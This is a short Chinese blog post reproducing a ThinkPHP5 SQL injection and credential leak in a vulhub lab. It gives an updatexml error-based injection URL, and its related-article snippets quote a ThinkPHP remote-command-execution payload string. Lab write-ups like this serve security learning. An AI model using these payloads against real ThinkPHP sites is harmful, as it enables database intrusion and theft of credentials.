ThinkPHP5 SQL注入漏洞 && 敏感信息泄露

最新推荐文章于 2024-04-27 15:40:54 发布
最新推荐文章于 2024-04-27 15:40:54 发布
阅读量736 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/119755464
版权

漏洞复现

我们访问http://your-ip/index.php?ids[]=1&ids[]=2即可看到用户都没列举出来了存在该漏洞:
在这里插入图片描述
访问http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,可以看到爆出了许多信息:
在这里插入图片描述
更多的利用方法还是自行寻找来的方便,在该环境中报错信息里面还包含了数据库的账户密码:
在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] Thinkphp SQL注入 && 敏感信息泄露
qq_51577576的博客
09-29 1688
[ vulhub漏洞复现篇 ] Thinkphp SQL注入 && 敏感信息泄露 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。 Thinkphp5X设计缺陷导致泄漏数据库账户密码
Thinkphp5.X 设计缺陷导致泄漏数据库账户密码
Fly_鹏程万里
12-11 9497
0x00 框架运行环境 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。 PDO查询能阻止大多数传参攻击,而且框架要求的php版本是5.4;这就防止了php在5.3.6下有个PDO本地查询造成SQL注入漏洞。...
追洞小组 | ThinkPHP5 SQL注入漏洞&敏感信息泄露
Ms08067安全实验室
03-02 506
文章来源|MS08067 WEB攻防知识星球本文作者:叫我啊(Ms08067实验室追洞小组成员)漏洞复现分析 认准追洞小组一、漏洞介绍ThinkPHP是一个开源的,快速、简单的面向对象的...
ThinkPHP5 SQL注入漏洞 && 敏感信息泄露 漏洞复现
ADummy的博客
02-20 1740
ThinkPHP5 SQL注入漏洞 && 敏感信息泄露 by ADummy 0x00利用路线 ​ url直接注入—>有回显 0x01漏洞介绍 ​ ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(<5.1.23)中,开启debug模式,传入的某参数在绑定编译指令的时候又没有安全处理,预编译的时候导致SQL异常报错。然而thinkphp5默认开启debug模式,在漏洞环境下构造错误的SQL语法会泄漏数据库账户和密码 0x02漏洞复现 payload: h
vulhub thinkPHP5 SQL注入&&敏感信息泄露漏洞复现
weixin_53696027的博客
05-22 737
关于vulhub中thinkPHP SQL注入漏洞复现及其简单的原理介绍
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)
黑白的博客
12-22 1276
声明 好好学习,天天向上 漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 影响范围 Ghostscript 9.24之前版本 复现过程 这里使用7.0.8版本 使
对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析
10-25
但即使是成熟的框架也可能存在安全漏洞,例如文件ThinkPHP/Lib/Core/Model.class.php中的SQL注入漏洞就是一个例子,它发生在ThinkPHP3.1.3及更早的版本中。 SQL注入是一种常见的网络攻击手段,攻击者通过在数据库...
ThinkPHP5 SQL注入漏洞&&敏感信息泄露漏洞
最新发布
weixin_45653478的博客
04-27 809
ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(<5.1.23)中,开启debug模式,传入的某参数在绑定编译指令的时候又没有安全处理,预编译的时候导致SQL异常报错。然而thinkphp5默认开启debug模式,在漏洞环境下构造错误的SQL语法会泄漏数据库账户和密码。
thinkphp3 与thinkphp5 日志信息泄露检测脚本.zip
02-20
thinkphp3 与thinkphp5 日志信息泄露检测脚本,亲测有效可用,如有侵权,请联系CSDN管理员删除即可
thinkphp5.0.24.zip
10-26
thinkphp5.0.24版本 直接解压覆盖对应目录即可
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
记复现“Thinkphp5.X设计缺陷导致泄漏数据库账户密码”
KEY0NE的个人博客
07-25 1847
原文见:Thinkphp5.X设计缺陷导致泄漏数据库账户密码本文只对复现漏洞所遇到的问题做个记录,方便想要复现漏洞的朋友们。对漏洞的分析,作者已经在原文中详细阐述了,在此不再赘述。实验环境:Apache+php5.5+php.ini开启PDO程序包下载:http://www.jb51.net/codes/10793.html实验过程修改文件:ThinkPHP_5....
vulhub中ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
yougexiaojiuguan的博客
03-06 1037
漏洞复现过程的记录
Vulhub漏洞复现之ThinkPHP5.X SQL注入漏洞敏感信息泄露漏洞
来到了学渣的博客
01-21 3365
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 前文: 名字雷同但差个n的两种类型漏洞环境靶机:vulnhub与vulhub的区别 Vulhub漏洞复现之Dns域传送漏洞 Vulhub漏洞复现之Django (小于2.0.8)任意url跳转漏洞(CVE-2018-14574) 漏洞影响: <5....
thinkphp5.X漏洞利用EXP
Websec
05-17 2180
thinkphp5最出名的就是rce,rce有两个大版本的分别 ThinkPHP 5.0-5.0.24 ThinkPHP 5.1.0-5.1.30 因为漏洞触发点和版本的不同,导致payload分为多种,其中一些payload需要取决于debug选项比如直接访问路由触发的 5.1.x : ?s=index/thinkRequest/input&filter[]=system&data=pwd ?s=index/thinkviewdriverPhp/display&conte
(超级有用)ThinkPHP 5漏洞分析之SQL注入
MKAJZHAQZKJ的博客
06-16 3167
本次漏洞存在于Builder类的parseData方法中。由于程序没有对数据进行很好的过滤,将数据拼接进SQL语句,导致SQL注入漏洞的产生。漏洞影响版本:5.0.13<=ThinkPHP<=5.0.15、5.1.0<=ThinkPHP<=5.1.5。 环境搭建 $ composer create-project --prefer-dist topthink/think=5.0.15 v5.0.15 1. 安装后,因为默认framework版本为...
thinkphp5 漏洞原理分析合集
m0_46689007的博客
11-30 7317
跟进Request.php中method(),Config::get(‘var_method’)提权var_method中的值,var_method的又为_method,这个_method可控,我们传入’__construct’,到$this->{$this->method}($_POST);因为执行的是get方法,跟进get()方法,此方法为读取配置文件,所以我们构造的参数进入get()中就会控制读取内容,后面返回self::$config[$range][$name[0]][$name[1]]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值